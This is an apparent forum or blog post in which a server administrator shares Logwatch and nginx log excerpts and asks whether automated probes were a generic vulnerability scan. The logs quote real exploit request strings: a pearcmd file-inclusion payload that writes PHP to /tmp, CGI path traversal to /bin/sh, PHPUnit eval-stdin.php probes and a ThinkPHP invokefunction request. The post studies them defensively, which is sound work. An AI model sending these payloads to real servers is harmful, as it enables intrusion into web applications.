• caglararli@hotmail.com
  • 05386281520

Can anyone provide any advice on this Logwatch analysis?

Çağlar Arlı      -    15 Views
7Ağu

Can anyone provide any advice on this Logwatch analysis?

I received this Logwatch report:

 Connection attempts using mod_proxy:
    xx.xx.xxx.xx -> codeforces.com:443: 1 Time(s)
 
 A total of 2 possible successful probes were detected (the following URLs
 contain strings that match one or more of a listing of strings that
 indicate a possible exploit):
 
    /index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/<?echo(md5(\x22hi\x22));?>+/tmp/index1.php HTTP Response 200 
    /index.php?lang=../../../../../../../../tmp/index1 HTTP Response 200

I'm trying to understand what is going on, so I did the following steps.

<?echo(md5(\x22hi\x22));?>

So, he potentially created this file '/tmp/index1.php', which contains the MD5 hash of the string 'hi'. Then he tries to access this file to verify if its creation was successful.

The directory '/usr/local/lib/php/' doesn't exist, and there is no 'index1.php' file in the '/tmp' directory.

I took a look at '/var/log/nginx/access.log':

xxx.xxx.xx.xx - - [07/Aug/2024:00:03:59 +0000] "GET /index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/<?echo(md5(\x22hi\x22));?>+/tmp/index1.php HTTP/1.1" 404 153 "-" "Custom-AsyncHttpClient"
xx.xxx.xxx.xx - - [07/Aug/2024:05:39:10 +0000] "GET /index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/<?echo(md5(\x22hi\x22));?>+/tmp/index1.php HTTP/1.1" 404 153 "-" "Custom-AsyncHttpClient"

So, the server returns a 404 error.

I searched for more information about both IPs in the access.log and found the following for each IP:

sudo grep 'xxx.xxx.xx.xx' /var/log/nginx/access.log

xxx.xxx.xx.xx - - [07/Aug/2024:00:03:16 +0000] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 157 "-" "-"
xxx.xxx.xx.xx - - [07/Aug/2024:00:03:18 +0000] "POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh HTTP/1.1" 400 157 "-" "-"
xxx.xxx.xx.xx - - [07/Aug/2024:00:03:18 +0000] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 153 "-" "Custom-AsyncHttpClient"
xxx.xxx.xx.xx - - [07/Aug/2024:00:03:18 +0000] "GET /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 153 "-" "Custom-AsyncHttpClient"
xxx.xxx.xx.xx - - [07/Aug/2024:00:03:20 +0000] "GET /vendor/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 153 "-" "Custom-AsyncHttpClient"
xxx.xxx.xx.xx - - [07/Aug/2024:00:03:20 +0000] "GET /vendor/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 153 "-" "Custom-AsyncHttpClient"
xxx.xxx.xx.xx - - [07/Aug/2024:00:03:21 +0000] "GET /vendor/phpunit/phpunit/LICENSE/eval-stdin.php HTTP/1.1" 404 153 "-" "Custom-AsyncHttpClient"
xxx.xxx.xx.xx - - [07/Aug/2024:00:03:21 +0000] "GET /vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 153 "-" "Custom-AsyncHttpClient"
xxx.xxx.xx.xx - - [07/Aug/2024:00:03:22 +0000] "GET /phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 153 "-" "Custom-AsyncHttpClient"
xxx.xxx.xx.xx - - [07/Aug/2024:00:03:23 +0000] "GET /phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 153 "-" "Custom-AsyncHttpClient"
xxx.xxx.xx.xx - - [07/Aug/2024:00:03:32 +0000] "GET /phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 153 "-" "Custom-AsyncHttpClient"
xxx.xxx.xx.xx - - [07/Aug/2024:00:03:32 +0000] "GET /phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 153 "-" "Custom-AsyncHttpClient"
xxx.xxx.xx.xx - - [07/Aug/2024:00:03:33 +0000] "GET /lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 153 "-" "Custom-AsyncHttpClient"
xxx.xxx.xx.xx - - [07/Aug/2024:00:03:33 +0000] "GET /lib/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 153 "-" "Custom-AsyncHttpClient"
xxx.xxx.xx.xx - - [07/Aug/2024:00:03:36 +0000] "GET /lib/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 153 "-" "Custom-AsyncHttpClient"
xxx.xxx.xx.xx - - [07/Aug/2024:00:03:36 +0000] "GET /lib/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 153 "-" "Custom-AsyncHttpClient"
xxx.xxx.xx.xx - - [07/Aug/2024:00:03:37 +0000] "GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 153 "-" "Custom-AsyncHttpClient"
xxx.xxx.xx.xx - - [07/Aug/2024:00:03:38 +0000] "GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 153 "-" "Custom-AsyncHttpClient"
xxx.xxx.xx.xx - - [07/Aug/2024:00:03:38 +0000] "GET /www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 153 "-" "Custom-AsyncHttpClient"
xxx.xxx.xx.xx - - [07/Aug/2024:00:03:39 +0000] "GET /ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 153 "-" "Custom-AsyncHttpClient"
xxx.xxx.xx.xx - - [07/Aug/2024:00:03:39 +0000] "GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 153 "-" "Custom-AsyncHttpClient"
xxx.xxx.xx.xx - - [07/Aug/2024:00:03:40 +0000] "GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 153 "-" "Custom-AsyncHttpClient"
xxx.xxx.xx.xx - - [07/Aug/2024:00:03:41 +0000] "GET /ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 153 "-" "Custom-AsyncHttpClient"
xxx.xxx.xx.xx - - [07/Aug/2024:00:03:41 +0000] "GET /V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 153 "-" "Custom-AsyncHttpClient"
xxx.xxx.xx.xx - - [07/Aug/2024:00:03:41 +0000] "GET /tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 153 "-" "Custom-AsyncHttpClient"
xxx.xxx.xx.xx - - [07/Aug/2024:00:03:42 +0000] "GET /test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 153 "-" "Custom-AsyncHttpClient"
xxx.xxx.xx.xx - - [07/Aug/2024:00:03:43 +0000] "GET /testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 153 "-" "Custom-AsyncHttpClient"
xxx.xxx.xx.xx - - [07/Aug/2024:00:03:45 +0000] "GET /api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 153 "-" "Custom-AsyncHttpClient"
xxx.xxx.xx.xx - - [07/Aug/2024:00:03:45 +0000] "GET /demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 153 "-" "Custom-AsyncHttpClient"
xxx.xxx.xx.xx - - [07/Aug/2024:00:03:46 +0000] "GET /cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 153 "-" "Custom-AsyncHttpClient"
xxx.xxx.xx.xx - - [07/Aug/2024:00:03:48 +0000] "GET /crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 153 "-" "Custom-AsyncHttpClient"
xxx.xxx.xx.xx - - [07/Aug/2024:00:03:48 +0000] "GET /admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 153 "-" "Custom-AsyncHttpClient"
xxx.xxx.xx.xx - - [07/Aug/2024:00:03:51 +0000] "GET /backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 153 "-" "Custom-AsyncHttpClient"
xxx.xxx.xx.xx - - [07/Aug/2024:00:03:52 +0000] "GET /blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 153 "-" "Custom-AsyncHttpClient"
xxx.xxx.xx.xx - - [07/Aug/2024:00:03:53 +0000] "GET /workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 153 "-" "Custom-AsyncHttpClient"
xxx.xxx.xx.xx - - [07/Aug/2024:00:03:53 +0000] "GET /panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 153 "-" "Custom-AsyncHttpClient"
xxx.xxx.xx.xx - - [07/Aug/2024:00:03:54 +0000] "GET /public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 153 "-" "Custom-AsyncHttpClient"
xxx.xxx.xx.xx - - [07/Aug/2024:00:03:54 +0000] "GET /apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 153 "-" "Custom-AsyncHttpClient"
xxx.xxx.xx.xx - - [07/Aug/2024:00:03:55 +0000] "GET /app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 153 "-" "Custom-AsyncHttpClient"
xxx.xxx.xx.xx - - [07/Aug/2024:00:03:55 +0000] "GET /index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1" 404 153 "-" "Custom-AsyncHttpClient"
xxx.xxx.xx.xx - - [07/Aug/2024:00:03:58 +0000] "GET /public/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1" 404 153 "-" "Custom-AsyncHttpClient"
xxx.xxx.xx.xx - - [07/Aug/2024:00:03:59 +0000] "GET /index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/<?echo(md5(\x22hi\x22));?>+/tmp/index1.php HTTP/1.1" 404 153 "-" "Custom-AsyncHttpClient"
xxx.xxx.xx.xx - - [07/Aug/2024:00:04:00 +0000] "GET /index.php?lang=../../../../../../../../tmp/index1 HTTP/1.1" 404 153 "-" "Custom-AsyncHttpClient"

So, are they using a 'generic' script to check for vulnerabilities?

If you have any advice for a newbie, thank you.

Ağustos 2024
P S Ç P C C P
 1234
567891011
12131415161718
19202122232425
262728293031  

Son Yazılar

Son Yorumlar